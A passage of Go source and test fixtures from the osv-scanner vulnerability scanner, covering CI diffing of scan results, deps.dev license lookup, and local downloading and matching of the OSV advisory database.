"Panic due to improper input validation in github.com/gogo/protobuf", "details": "Due to improper bounds checking, maliciously crafted input to generated Unmarshal methods can cause an out-of-bounds panic. If parsing messages from untrusted parties, this may be used as a denial of service vector.", "affected": [ { "package": { "ecosystem": "Go", "name": "github.com/gogo/protobuf", "purl": "pkg:golang/github.com/gogo/protobuf" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.3.2" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2021-0053.json" }, "ecosystem_specific": { "imports": [ { "path": "github.com/gogo/protobuf/plugin/unmarshal", "symbols": [ "unmarshal.Generate", "unmarshal.field" ] } ] } } ], "references": [ { "type": "FIX", "url": "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc" } ], "database_specific": { "url": "https://pkg.go.dev/vuln/GO-2021-0053" } } ], "groups": [ { "ids": [ "GHSA-c3h9-896r-86jm" ] } ] } ] } ] } ================================================ FILE: internal/ci/testdata/vulns/test-vuln-results-d.json ================================================ { "results": [ { "source": { "path": "/path/to/scorecard-check-osv-e2e/go.mod", "type": "lockfile" }, "packages": [ { "package": { "name": "github.com/brandnew/package", "version": "1.0.0", "ecosystem": "Go" }, "vulnerabilities": [], "groups": [] } ] } ] } ================================================ FILE: internal/ci/testmain_test.go ================================================ package ci_test import ( "testing" "github.com/google/osv-scanner/v2/internal/testutility" ) func TestMain(m *testing.M) { m.Run() testutility.CleanSnapshots(m) } ================================================ FILE: internal/ci/utility.go ================================================ // Package ci provides utility functions for CI integration. package ci import ( "encoding/json" "fmt" "os" "github.com/google/osv-scanner/v2/pkg/models" ) func LoadVulnResults(path string) (models.VulnerabilityResults, error) { file, err := os.Open(path) if err != nil { return models.VulnerabilityResults{}, fmt.Errorf("failed to load '%s'", path) } defer file.Close() var value models.VulnerabilityResults err = json.NewDecoder(file).Decode(&value) if err != nil { return models.VulnerabilityResults{}, fmt.Errorf("failed to parse '%s'", path) } return value, nil } ================================================ FILE: internal/ci/utility_test.go ================================================ package ci_test import ( "testing" "time" "github.com/google/go-cmp/cmp" "github.com/google/osv-scanner/v2/internal/ci" "github.com/google/osv-scanner/v2/pkg/models" "github.com/ossf/osv-schema/bindings/go/osvschema" "google.golang.org/protobuf/testing/protocmp" "google.golang.org/protobuf/types/known/structpb" "google.golang.org/protobuf/types/known/timestamppb" ) func parseTime(t *testing.T, str string) time.Time { t.Helper() ti, err := time.Parse(time.RFC3339, str) if err != nil { panic(err) } return ti } func TestLoadVulnResults(t *testing.T) { t.Parallel() tests := []struct { name string path string want models.VulnerabilityResults wantErr bool }{ { name: "does_not_exist", path: "./testdata/does_not_exist", want: models.VulnerabilityResults{}, wantErr: true, }, { name: "invalid_json", path: "./testdata/not-json.txt", want: models.VulnerabilityResults{}, wantErr: true, }, { name: "results_empty", path: "./testdata/results-empty.json", want: models.VulnerabilityResults{ Results: []models.PackageSource{}, ExperimentalAnalysisConfig: models.ExperimentalAnalysisConfig{ Licenses: models.ExperimentalLicenseConfig{ Summary: true, Allowlist: []models.License{"MIT"}, }, }, ImageMetadata: nil, LicenseSummary: nil, }, wantErr: false, }, { name: "results_some", path: "./testdata/results-some.json", want: models.VulnerabilityResults{ Results: []models.PackageSource{ { Source: models.SourceInfo{ Path: "/path/to/different-dir/go.mod", Type: "lockfile", }, ExperimentalPES: nil, Packages: []models.PackageVulns{ { Package: models.PackageInfo{ Name: "github.com/gogo/protobuf", Version: "1.3.1", Ecosystem: "Go", }, Vulnerabilities: []*osvschema.Vulnerability{ { SchemaVersion: "1.4.0", Id: "GO-2021-0053", Modified: timestamppb.New(parseTime(t, "2023-06-12T18:45:41Z")), Published: timestamppb.New(parseTime(t, "2021-04-14T20:04:52Z")), Aliases: []string{"CVE-2021-3121", "GHSA-c3h9-896r-86jm"}, Summary: "Panic due to improper input validation in github.com/gogo/protobuf", Details: "Due to improper bounds checking, maliciously crafted input to generated Unmarshal methods can cause an out-of-bounds panic. If parsing messages from untrusted parties, this may be used as a denial of service vector.", Affected: []*osvschema.Affected{ { Package: &osvschema.Package{ Ecosystem: "Go", Name: "github.com/gogo/protobuf", Purl: "pkg:golang/github.com/gogo/protobuf", }, Ranges: []*osvschema.Range{{ Type: osvschema.Range_SEMVER, Events: []*osvschema.Event{ {Introduced: "0"}, {Fixed: "1.3.2"}, }, }}, DatabaseSpecific: &structpb.Struct{ Fields: map[string]*structpb.Value{ "source": { Kind: &structpb.Value_StringValue{ StringValue: "https://vuln.go.dev/ID/GO-2021-0053.json", }, }, }, }, EcosystemSpecific: &structpb.Struct{ Fields: map[string]*structpb.Value{ "imports": { Kind: &structpb.Value_ListValue{ ListValue: &structpb.ListValue{ Values: []*structpb.Value{ { Kind: &structpb.Value_StructValue{ StructValue: &structpb.Struct{ Fields: map[string]*structpb.Value{ "path": { Kind: &structpb.Value_StringValue{ StringValue: "github.com/gogo/protobuf/plugin/unmarshal", }, }, "symbols": { Kind: &structpb.Value_ListValue{ ListValue: &structpb.ListValue{ Values: []*structpb.Value{ { Kind: &structpb.Value_StringValue{ StringValue: "unmarshal.Generate", }, }, { Kind: &structpb.Value_StringValue{ StringValue: "unmarshal.field", }, }, }, }, }, }, }, }, }, }, }, }, }, }, }, }, }, }, References: []*osvschema.Reference{ {Type: osvschema.Reference_FIX, Url: "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc"}, }, DatabaseSpecific: &structpb.Struct{ Fields: map[string]*structpb.Value{ "url": { Kind: &structpb.Value_StringValue{ StringValue: "https://pkg.go.dev/vuln/GO-2021-0053", }, }, }, }, }, }, Groups: []models.GroupInfo{{IDs: []string{"GO-2021-0053"}}}, Licenses: nil, LicenseViolations: nil, }, }, }, }, ExperimentalAnalysisConfig: models.ExperimentalAnalysisConfig{ Licenses: models.ExperimentalLicenseConfig{ Summary: true, }, }, ImageMetadata: nil, LicenseSummary: nil, }, wantErr: false, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() got, err := ci.LoadVulnResults(tt.path) if (err != nil) != tt.wantErr { t.Errorf("LoadVulnResults() error = %v, wantErr %v", err, tt.wantErr) return } if diff := cmp.Diff(tt.want, got, protocmp.Transform()); diff != "" { t.Errorf("LoadVulnResults() returned unexpected result (-want +got):\n%s", diff) } }) } } ================================================ FILE: internal/ci/vulnerability_result_diff.go ================================================ package ci import ( "github.com/google/osv-scanner/v2/internal/grouper" "github.com/google/osv-scanner/v2/internal/output" "github.com/google/osv-scanner/v2/pkg/models" ) // DiffVulnerabilityResults will return any new vulnerabilities that are in `newRes` // which is not present in `oldRes`, but not the reverse. func DiffVulnerabilityResults(oldRes, newRes models.VulnerabilityResults) models.VulnerabilityResults { result := models.VulnerabilityResults{} // Initialize caches for quick lookup sourceToIndex, packageToIndex, vulnToIndex := initializeCaches(oldRes) for _, ps := range newRes.Results { sourceIdx, sourceExists := sourceToIndex[ps.Source] if !sourceExists { // Newly introduced source, so all results for this source are going to be new, add everything for this source result.Results = append(result.Results, ps) continue } // Otherwise the old source used to exist, so we need to find the difference in the packages result.Results = append(result.Results, models.PackageSource{ Source: ps.Source, }) resultPS := &result.Results[len(result.Results)-1] for _, pv := range ps.Packages { pkgIdx, packageExists := packageToIndex[sourceIdx][pv.Package] if !packageExists { // Newly introduced package, so all results for this package are going to be new, add everything for this package resultPS.Packages = append(resultPS.Packages, pv) continue } // Otherwise the old package used to exist, so we need to find the difference in the vulnerabilities // Only copy over packages as vulns and groups might change resultPS.Packages = append(resultPS.Packages, models.PackageVulns{ Package: pv.Package, }) resultPV := &resultPS.Packages[len(resultPS.Packages)-1] for _, v := range pv.Vulnerabilities { if !vulnToIndex[sourceIdx][pkgIdx][v.GetId()] { // Vulnerability is new, add it to the results resultPV.Vulnerabilities = append(resultPV.Vulnerabilities, v) continue } } if len(resultPV.Vulnerabilities) == 0 { // No vulns, so we can remove the PackageVulns entry entirely, and skip grouping resultPS.Packages = resultPS.Packages[:len(resultPS.Packages)-1] continue } // Rebuild the groups lost in the previous step groups := grouper.Group(grouper.ConvertVulnerabilityToIDAliases(resultPV.Vulnerabilities)) for i, group := range groups { groups[i].MaxSeverity = output.MaxSeverity(group, *resultPV) } resultPV.Groups = groups } if len(resultPS.Packages) == 0 { // No packages, so we can remove the PackageSource entry entirely result.Results = result.Results[:len(result.Results)-1] continue } } return result } // initializeCaches sets up maps for quick lookup of sources, packages, and vulnerabilities by their indices. func initializeCaches(oldRes models.VulnerabilityResults) (map[models.SourceInfo]int, []map[models.PackageInfo]int, [][]map[string]bool) { sourceToIndex := make(map[models.SourceInfo]int, len(oldRes.Results)) // The index in the array corresponds to a source index, a query would look like packageToIndex[sourceIndex][packageInfo] packageToIndex := make([]map[models.PackageInfo]int, len(oldRes.Results)) // The first index in the array corresponds to a source index, and the second index corresponds to a package index // a query would look like vulnToIndex[sourceIndex][packageIndex][vulnID] vulnToIndex := make([][]map[string]bool, len(oldRes.Results)) // Populate index maps for sources, packages, and vulnerabilities for sourceIndex, vulnResult := range oldRes.Results { sourceToIndex[oldRes.Results[sourceIndex].Source] = sourceIndex if vulnToIndex[sourceIndex] == nil { vulnToIndex[sourceIndex] = make([]map[string]bool, len(vulnResult.Packages)) } for packageIndex, pkg := range vulnResult.Packages { if packageToIndex[sourceIndex] == nil { packageToIndex[sourceIndex] = make(map[models.PackageInfo]int, len(vulnResult.Packages)) } packageToIndex[sourceIndex][pkg.Package] = packageIndex if vulnToIndex[sourceIndex][packageIndex] == nil { vulnToIndex[sourceIndex][packageIndex] = make(map[string]bool, len(pkg.Vulnerabilities)) } for _, vuln := range pkg.Vulnerabilities { vulnToIndex[sourceIndex][packageIndex][vuln.GetId()] = true // Mark the vulnerability as present } } } return sourceToIndex, packageToIndex, vulnToIndex } // DiffVulnerabilityResultsByOccurrences will return the occurrence of each vulnerability that are in `newRes` // which is not present in `oldRes`, but not the reverse. This calculates the difference by vulnerability ID, // while ignoring the source of the vulnerability. // // This prevents us reporting "new" vulnerabilities in a PR when a previously vulnerable file is being moved. func DiffVulnerabilityResultsByOccurrences(oldRes, newRes models.VulnerabilityResults) map[string]int { oldResFlat := oldRes.Flatten() newResFlat := newRes.Flatten() oldResMap := map[string]int{} newResMap := map[string]int{} for _, vf := range oldResFlat { oldResMap[vf.Vulnerability.GetId()] += 1 } for _, vf := range newResFlat { newResMap[vf.Vulnerability.GetId()] += 1 } for k, oldVulnCount := range oldResMap { // If the new result has fewer vulnerabilities than the old result remove the entry from the new result. // `map`'s default value is 0 when empty, and delete also works fine when the entry is empty if newResMap[k] <= oldVulnCount { delete(newResMap, k) } } return newResMap } ================================================ FILE: internal/ci/vulnerability_result_diff_test.go ================================================ package ci_test import ( "testing" "github.com/google/osv-scanner/v2/internal/ci" "github.com/google/osv-scanner/v2/internal/testutility" "github.com/google/osv-scanner/v2/pkg/models" ) func TestDiffVulnerabilityResults(t *testing.T) { t.Parallel() type args struct { oldRes models.VulnerabilityResults newRes models.VulnerabilityResults } tests := []struct { name string args args }{ { // diff should be empty since the old and new results are the same name: "same_everything", args: args{ oldRes: testutility.LoadJSONFixture[models.VulnerabilityResults](t, "testdata/vulns/test-vuln-results-a.json"), newRes: testutility.LoadJSONFixture[models.VulnerabilityResults](t, "testdata/vulns/test-vuln-results-a.json"), }, }, { // diff should have the moved package only name: "same_packages_but_with_one_moved", args: args{ oldRes: testutility.LoadJSONFixture[models.VulnerabilityResults](t, "testdata/vulns/test-vuln-results-a.json"), newRes: testutility.LoadJSONFixture[models.VulnerabilityResults](t, "testdata/vulns/test-vuln-results-a-1.json"), }, }, { // diff should have just the new vuln name: "same_packages_with_new_vuln", args: args{ oldRes: testutility.LoadJSONFixture[models.VulnerabilityResults](t, "testdata/vulns/test-vuln-results-a.json"), newRes: testutility.LoadJSONFixture[models.VulnerabilityResults](t, "testdata/vulns/test-vuln-results-b.json"), }, }, { // diff should be empty name: "new_has_one_less_vuln", args: args{ oldRes: testutility.LoadJSONFixture[models.VulnerabilityResults](t, "testdata/vulns/test-vuln-results-b.json"), newRes: testutility.LoadJSONFixture[models.VulnerabilityResults](t, "testdata/vulns/test-vuln-results-a.json"), }, }, { // diff should have all the new vulns name: "new_vuln_and_packages", args: args{ oldRes: testutility.LoadJSONFixture[models.VulnerabilityResults](t, "testdata/vulns/test-vuln-results-c.json"), newRes: testutility.LoadJSONFixture[models.VulnerabilityResults](t, "testdata/vulns/test-vuln-results-b.json"), }, }, { // diff should have no vulns name: "old_vuln_and_packages_gone", args: args{ oldRes: testutility.LoadJSONFixture[models.VulnerabilityResults](t, "testdata/vulns/test-vuln-results-b.json"), newRes: testutility.LoadJSONFixture[models.VulnerabilityResults](t, "testdata/vulns/test-vuln-results-c.json"), }, }, { // diff should be empty since new package does not have any vulns name: "old_package_replaced_with_new_package", args: args{ oldRes: testutility.LoadJSONFixture[models.VulnerabilityResults](t, "testdata/vulns/test-vuln-results-a.json"), newRes: testutility.LoadJSONFixture[models.VulnerabilityResults](t, "testdata/vulns/test-vuln-results-d.json"), }, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() got := ci.DiffVulnerabilityResults(tt.args.oldRes, tt.args.newRes) testutility.NewSnapshot().MatchJSON(t, got) }) } } func TestDiffVulnerabilityByUniqueVulnCountResults(t *testing.T) { t.Parallel() type args struct { oldRes models.VulnerabilityResults newRes models.VulnerabilityResults } tests := []struct { name string args args }{ { // diff should be empty name: "same_packages_with_different_source_path", args: args{ oldRes: testutility.LoadJSONFixture[models.VulnerabilityResults](t, "testdata/vulns/test-vuln-results-a.json"), newRes: testutility.LoadJSONFixture[models.VulnerabilityResults](t, "testdata/vulns/test-vuln-results-a-1.json"), }, }, { // diff should be empty name: "same_everything", args: args{ oldRes: testutility.LoadJSONFixture[models.VulnerabilityResults](t, "testdata/vulns/test-vuln-results-a.json"), newRes: testutility.LoadJSONFixture[models.VulnerabilityResults](t, "testdata/vulns/test-vuln-results-a.json"), }, }, { // diff should have just the new vuln name: "same_package_with_new_vuln", args: args{ oldRes: testutility.LoadJSONFixture[models.VulnerabilityResults](t, "testdata/vulns/test-vuln-results-a.json"), newRes: testutility.LoadJSONFixture[models.VulnerabilityResults](t, "testdata/vulns/test-vuln-results-b.json"), }, }, { // diff should be empty name: "new_has_one_less_vuln", args: args{ oldRes: testutility.LoadJSONFixture[models.VulnerabilityResults](t, "testdata/vulns/test-vuln-results-b.json"), newRes: testutility.LoadJSONFixture[models.VulnerabilityResults](t, "testdata/vulns/test-vuln-results-a.json"), }, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() got := ci.DiffVulnerabilityResultsByOccurrences(tt.args.oldRes, tt.args.newRes) testutility.NewSnapshot().MatchJSON(t, got) }) } } ================================================ FILE: internal/clients/clientimpl/licensematcher/licensematcher.go ================================================ // Package licensematcher implements a client for matching licenses using the deps.dev API. package licensematcher import ( "context" depsdevpb "deps.dev/api/v3" "github.com/google/osv-scalibr/clients/datasource" "github.com/google/osv-scalibr/extractor" "github.com/google/osv-scanner/v2/internal/depsdev" "github.com/google/osv-scanner/v2/internal/imodels" "github.com/google/osv-scanner/v2/pkg/models" "golang.org/x/sync/errgroup" "google.golang.org/grpc/codes" "google.golang.org/grpc/status" ) const ( maxConcurrentRequests = 1000 ) // DepsDevLicenseMatcher implements the LicenseMatcher interface with a deps.dev client. // It sends out requests for every package version and does not perform caching. type DepsDevLicenseMatcher struct { Client *datasource.CachedInsightsClient } func (matcher *DepsDevLicenseMatcher) MatchLicenses(ctx context.Context, packages []*extractor.Package) error { queries := make([]*depsdevpb.GetVersionRequest, len(packages)) for i, pkg := range packages { system, ok := depsdev.System[imodels.Ecosystem(pkg).Ecosystem] if !ok || imodels.Name(pkg) == "" || imodels.Version(pkg) == "" { continue } queries[i] = versionQuery(system, imodels.Name(pkg), imodels.Version(pkg)) } pkgLicenses, err := matcher.makeVersionRequest(ctx, queries) if err != nil { return err } for i, licenses := range pkgLicenses { packages[i].Licenses = make([]string, len(licenses)) for j, license := range licenses { packages[i].Licenses[j] = string(license) } } return nil } // makeVersionRequest calls the deps.dev GetVersion gRPC API endpoint for each // query. It makes these requests concurrently, sharing the single HTTP/2 // connection. The order in which the requests are specified should correspond // to the order of licenses returned by this function. func (matcher *DepsDevLicenseMatcher) makeVersionRequest(ctx context.Context, queries []*depsdevpb.GetVersionRequest) ([][]models.License, error) { licenses := make([][]models.License, len(queries)) g, ctx := errgroup.WithContext(ctx) g.SetLimit(maxConcurrentRequests) for i := range queries { if queries[i] == nil { // This may be a private package. licenses[i] = []models.License{models.License("UNKNOWN")} continue } g.Go(func() error { resp, err := matcher.Client.GetVersion(ctx, queries[i]) if err != nil { if status.Code(err) == codes.NotFound { licenses[i] = append(licenses[i], "UNKNOWN") return nil } return err } ls := make([]models.License, len(resp.GetLicenses())) for j, license := range resp.GetLicenses() { ls[j] = models.License(license) } if len(ls) == 0 { // The deps.dev API will return an // empty slice if the license is // unknown. ls = []models.License{models.License("UNKNOWN")} } licenses[i] = ls return nil }) } if err := g.Wait(); err != nil { return nil, err } return licenses, nil } func versionQuery(system depsdevpb.System, name string, version string) *depsdevpb.GetVersionRequest { if system == depsdevpb.System_GO { // deps.dev uses native go versioning, which includes prepending v for package versions // and go for stdlib if name == "stdlib" { version = "go" + version } else { version = "v" + version } } return &depsdevpb.GetVersionRequest{ VersionKey: &depsdevpb.VersionKey{ System: system, Name: name, Version: version, }, } } ================================================ FILE: internal/clients/clientimpl/localmatcher/localmatcher.go ================================================ // Package localmatcher implements a vulnerability matcher // that uses a local database downloaded from osv.dev's export bucket. package localmatcher import ( "context" "errors" "fmt" "os" "path" "github.com/google/osv-scalibr/extractor" "github.com/google/osv-scalibr/inventory/osvecosystem" "github.com/google/osv-scanner/v2/internal/cmdlogger" "github.com/google/osv-scanner/v2/internal/imodels" "github.com/ossf/osv-schema/bindings/go/osvconstants" "github.com/ossf/osv-schema/bindings/go/osvschema" ) const zippedDBRemoteHost = "https://osv-vulnerabilities.storage.googleapis.com" const envKeyLocalDBCacheDirectory = "OSV_SCANNER_LOCAL_DB_CACHE_DIRECTORY" // LocalMatcher implements the VulnerabilityMatcher interface by downloading the osv export zip files, // and performing the matching locally. type LocalMatcher struct { dbBasePath string dbs map[osvconstants.Ecosystem]*ZipDB downloadDB bool // failedDBs keeps track of the errors when getting databases for each ecosystem failedDBs map[osvconstants.Ecosystem]error // userAgent sets the user agent requests for db zips are made with userAgent string } func NewLocalMatcher(localDBPath string, userAgent string, downloadDB bool) (*LocalMatcher, error) { dbBasePath, err := setupLocalDBDirectory(localDBPath) if err != nil { return nil, fmt.Errorf("could not create %s: %w", dbBasePath, err) } return &LocalMatcher{ dbBasePath: dbBasePath, dbs: make(map[osvconstants.Ecosystem]*ZipDB), downloadDB: downloadDB, userAgent: userAgent, failedDBs: make(map[osvconstants.Ecosystem]error), }, nil } func (matcher *LocalMatcher) MatchVulnerabilities(ctx context.Context, pkgs []*extractor.Package) ([][]*osvschema.Vulnerability, error) { results := make([][]*osvschema.Vulnerability, 0, len(pkgs)) // ensure all databases loaded so far have been fully loaded; this is just a // basic safeguard since we don't actually currently attempt to reuse matchers // across scans, and its possible we never will, so we don't need to be smart for _, db := range matcher.dbs { if db.Partial { return nil, errors.New("local matcher cannot be (re)used with a partially loaded database") } } for _, pkg := range pkgs { if ctx.Err() != nil { return nil, ctx.Err() } eco := imodels.Ecosystem(pkg).Ecosystem if imodels.Ecosystem(pkg).IsEmpty() { if imodels.Commit(pkg) == "" { // This should never happen, as those results will be filtered out before matching return nil, errors.New("ecosystem is empty and there is no commit hash") } // matching ecosystem-less versions can only be attempted if we have a version if imodels.Version(pkg) == "" { // Is a commit based query, skip local scanning results = append(results, []*osvschema.Vulnerability{}) // TODO (V2 logging): cmdlogger.Infof("Skipping commit scanning for: %s", imodels.Commit(pkg)) continue } eco = "GIT" } db, err := matcher.loadDBFromCache(ctx, eco, pkgs) if err != nil { // no logging here as the loader will have already done that results = append(results, []*osvschema.Vulnerability{}) continue } results = append(results, VulnerabilitiesAffectingPackage(db.Vulnerabilities, pkg)) } return results, nil } // LoadEcosystem tries to preload the ecosystem into the cache, and returns an error if the ecosystem // cannot be loaded. // // Preloaded databases include every advisory, so can be reused. func (matcher *LocalMatcher) LoadEcosystem(ctx context.Context, eco osvecosystem.Parsed) error { _, err := matcher.loadDBFromCache(ctx, eco.Ecosystem, nil) return err } func (matcher *LocalMatcher) loadDBFromCache(ctx context.Context, eco osvconstants.Ecosystem, invs []*extractor.Package) (*ZipDB, error) { if db, ok := matcher.dbs[eco]; ok { return db, nil } if matcher.failedDBs[eco] != nil { return nil, matcher.failedDBs[eco] } db, err := NewZippedDB( ctx, matcher.dbBasePath, string(eco), fmt.Sprintf("%s/%s/all.zip", zippedDBRemoteHost, eco), matcher.userAgent, !matcher.downloadDB, invs, ) if err != nil { matcher.failedDBs[eco] = err cmdlogger.Errorf("could not load db for %s ecosystem: %v", eco, err) return nil, err } cmdlogger.Infof("Loaded %s local db from %s", db.Name, db.StoredAt) matcher.dbs[eco] = db return db, nil } // setupLocalDBDirectory attempts to set up the directory the scanner should // use to store local databases. // // if a local path is explicitly provided either by the localDBPath parameter // or via the envKeyLocalDBCacheDirectory environment variable, the scanner will // attempt to use the user cache directory if possible or otherwise the temp directory // // if an error occurs at any point when a local path is not explicitly provided, // the scanner will fall back to the temp directory first before finally erroring func setupLocalDBDirectory(localDBPath string) (string, error) { var err error // fallback to the env variable if a local database path has not been provided if localDBPath == "" { if p, envSet := os.LookupEnv(envKeyLocalDBCacheDirectory); envSet { localDBPath = p } } implicitPath := localDBPath == "" // if we're implicitly picking a path, use the user cache directory if available if implicitPath { localDBPath, err = os.UserCacheDir() if err != nil { localDBPath = os.TempDir() } } altPath := path.Join(localDBPath, "osv-scanner") err = os.MkdirAll(altPath, 0750) if err == nil { return altPath, nil } // if we're implicitly picking a path, try the temp directory before giving up if implicitPath && localDBPath != os.TempDir() { return setupLocalDBDirectory(os.TempDir()) } return "", err } ================================================ FILE: internal/clients/clientimpl/localmatcher/testdata/db/file.json ================================================ { "id": "GHSA-1234" } ================================================ FILE: internal/clients/clientimpl/localmatcher/testdata/db/file.yaml ================================================ id: GHSA-5678 ================================================ FILE: internal/clients/clientimpl/localmatcher/testdata/db/nested-1/osv-1.json ================================================ { "id": "OSV-1" } ================================================ FILE: internal/clients/clientimpl/localmatcher/testdata/db/nested-2/invalid.json ================================================ { "id": "OSV-2" ================================================ FILE: internal/clients/clientimpl/localmatcher/testdata/db/nested-2/osv-2.json ================================================ { "id": "OSV-2" } ================================================ FILE: internal/clients/clientimpl/localmatcher/zip.go ================================================ package localmatcher import ( "archive/zip" "context" "encoding/base64" "encoding/binary" "errors" "fmt" "hash/crc32" "io" "net/http" "os" "path" "slices" "strings" "github.com/google/osv-scalibr/extractor" "github.com/google/osv-scanner/v2/internal/cmdlogger" "github.com/google/osv-scanner/v2/internal/imodels" "github.com/google/osv-scanner/v2/internal/utility/vulns" "github.com/ossf/osv-schema/bindings/go/osvschema" "github.com/tidwall/gjson" "google.golang.org/protobuf/encoding/protojson" ) type ZipDB struct { // the name of the database Name string // the url that the zip archive was downloaded from ArchiveURL string // whether this database should make any network requests Offline bool // the path to the zip archive on disk StoredAt string // the vulnerabilities that are loaded into this database Vulnerabilities []*osvschema.Vulnerability // User agent to query with UserAgent string // whether this database only has some of the advisories // loaded from the underlying zip file Partial bool } var ErrOfflineDatabaseNotFound = errors.New("no offline version of the OSV database is available") func fetchRemoteArchiveCRC32CHash(ctx context.Context, url string) (uint32, error) { req, err := http.NewRequestWithContext(ctx, http.MethodHead, url, nil) if err != nil { return 0, err } resp, err := http.DefaultClient.Do(req) if err != nil { return 0, err } defer resp.Body.Close() if resp.StatusCode != http.StatusOK { return 0, fmt.Errorf("db host returned %s", resp.Status) } for _, value := range resp.Header.Values("X-Goog-Hash") { if after, ok := strings.CutPrefix(value, "crc32c="); ok { value = after out, err := base64.StdEncoding.DecodeString(value) if err != nil { return 0, fmt.Errorf("could not decode crc32c= checksum: %w", err) } return binary.BigEndian.Uint32(out), nil } } return 0, errors.New("could not find crc32c= checksum") } func fetchLocalArchiveCRC32CHash(f *os.File) (uint32, error) { h := crc32.New(crc32.MakeTable(crc32.Castagnoli)) if _, err := io.Copy(h, f); err != nil { return 0, err } return h.Sum32(), nil } func (db *ZipDB) fetchZip(ctx context.Context) (*os.File, error) { f, err := os.Open(db.StoredAt) if db.Offline { if err != nil { return nil, ErrOfflineDatabaseNotFound } return f, nil } if err == nil { remoteHash, err := fetchRemoteArchiveCRC32CHash(ctx, db.ArchiveURL) if err != nil { return nil, err } localHash, err := fetchLocalArchiveCRC32CHash(f) if err != nil { return nil, err } if remoteHash == localHash { return f, nil } } req, err := http.NewRequestWithContext(ctx, http.MethodGet, db.ArchiveURL, nil) if err != nil { return nil, fmt.Errorf("could not retrieve OSV database archive: %w", err) } if db.UserAgent != "" { req.Header.Set("User-Agent", db.UserAgent) } resp, err := http.DefaultClient.Do(req) if err != nil { return nil, fmt.Errorf("could not retrieve OSV database archive: %w", err) } defer resp.Body.Close() if resp.StatusCode != http.StatusOK { return nil, fmt.Errorf("db host returned %s", resp.Status) } err = os.MkdirAll(path.Dir(db.StoredAt), 0750) if err != nil { return nil, fmt.Errorf("could not create cache directory: %w", err) } f, err = os.OpenFile(db.StoredAt, os.O_RDWR|os.O_CREATE|os.O_TRUNC, 0644) if err != nil { return nil, fmt.Errorf("could not create cache file: %w", err) } _, err = io.Copy(f, resp.Body) if err != nil { return nil, fmt.Errorf("could not write cache file: %w", err) } _, _ = f.Seek(0, io.SeekStart) return f, nil } func mightAffectPackagesBytes(content []byte, names []string) bool { affected := gjson.GetBytes(content, "affected") for _, name := range affected.Get("#.package.name").Array() { if slices.Contains(names, name.String()) { return true } } for _, repos := range affected.Get("#.ranges.#.repo").Array() { for _, repo := range repos.Array() { repoName := vulns.NormalizeRepo(repo.String()) for _, name := range names { // "name" will be the git repository in the case of the GIT ecosystem if repoName == vulns.NormalizeRepo(name) { return true } } } } return false } // Loads the given zip file into the database as an OSV. // It is assumed that the file is JSON and in the working directory of the db func (db *ZipDB) loadZipFile(zipFile *zip.File, names []string) { file, err := zipFile.Open() if err != nil { cmdlogger.Warnf("Could not read %s: %v", zipFile.Name, err) return } defer file.Close() content, err := io.ReadAll(file) if err != nil { cmdlogger.Warnf("Could not read %s: %v", zipFile.Name, err) return } // if we have been provided a list of package names, only load advisories // that might actually affect those packages, rather than all advisories if len(names) > 0 && !mightAffectPackagesBytes(content, names) { return } vulnerability := &osvschema.Vulnerability{} if err := protojson.Unmarshal(content, vulnerability); err != nil { cmdlogger.Warnf("%s is not a valid JSON file: %v", zipFile.Name, err) return } db.Vulnerabilities = append(db.Vulnerabilities, vulnerability) } // load fetches a zip archive of the OSV database and loads known vulnerabilities // from it (which are assumed to be in json files following the OSV spec). // // If a list of package names is provided, then only advisories with at least // one affected entry for a listed package will be loaded. // // Internally, the archive is cached along with the date that it was fetched // so that a new version of the archive is only downloaded if it has been // modified, per HTTP caching standards. func (db *ZipDB) load(ctx context.Context, names []string) error { db.Vulnerabilities = []*osvschema.Vulnerability{} f, err := db.fetchZip(ctx) if err != nil { return err } defer f.Close() s, err := f.Stat() if err != nil { return err } zipReader, err := zip.NewReader(f, s.Size()) if err != nil { return fmt.Errorf("could not read OSV database archive: %w", err) } // Read all the files from the zip archive for _, zipFile := range zipReader.File { if !strings.HasSuffix(zipFile.Name, ".json") { continue } db.loadZipFile(zipFile, names) } return nil } func NewZippedDB(ctx context.Context, dbBasePath, name, url, userAgent string, offline bool, pkgs []*extractor.Package) (*ZipDB, error) { db := &ZipDB{ Name: name, ArchiveURL: url, Offline: offline, StoredAt: path.Join(dbBasePath, name, "all.zip"), UserAgent: userAgent, // we only fully load the database if we're not provided a list of packages Partial: len(pkgs) != 0, } names := make([]string, 0, len(pkgs)) // map the packages to their names ahead of loading, // to make things simpler and reduce double working for _, pkg := range pkgs { names = append(names, imodels.Name(pkg)) } if err := db.load(ctx, names); err != nil { return nil, fmt.Errorf("unable to fetch OSV database: %w", err) } return db, nil } // VulnerabilitiesAffectingPackage returns the vulnerabilities that affects the provided package // // TODO: Move this to another file. func VulnerabilitiesAffectingPackage(allVulns []*osvschema.Vulnerability, pkg *extractor.Package) []*osvschema.Vulnerability { var vulnerabilities []*osvschema.Vulnerability for _, vulnerability := range allVulns { if vulnerability.GetWithdrawn() == nil && vulns.IsAffected(vulnerability, pkg) && !vulns.Include(vulnerabilities, vulnerability) { vulnerabilities = append(vulnerabilities, vulnerability) } } return vulnerabilities } ================================================ FILE: internal/clients/clientimpl/localmatcher/zip_test.go ================================================ package localmatcher_test import ( "archive/zip" "bytes" "encoding/base64" "encoding/binary" "errors" "hash/crc32" "net/http" "net/http/httptest" "os" "path" "sort" "testing" "github.com/google/go-cmp/cmp" "github.com/google/osv-scalibr/extractor" "github.com/google/osv-scanner/v2/internal/clients/clientimpl/localmatcher" "github.com/google/osv-scanner/v2/internal/testutility" "github.com/google/osv-scanner/v2/internal/version" "github.com/ossf/osv-schema/bindings/go/osvschema" "google.golang.org/protobuf/encoding/protojson" "google.golang.org/protobuf/testing/protocmp" ) const userAgent = "osv-scanner_test/" + version.OSVVersion func expectDBToHaveOSVs( t *testing.T, db *localmatcher.ZipDB, expect []*osvschema.Vulnerability, ) { t.Helper() vulns := db.Vulnerabilities sort.Slice(vulns, func(i, j int) bool { return vulns[i].GetId() < vulns[j].GetId() }) sort.Slice(expect, func(i, j int) bool { return expect[i].GetId() < expect[j].GetId() }) if diff := cmp.Diff(expect, vulns, 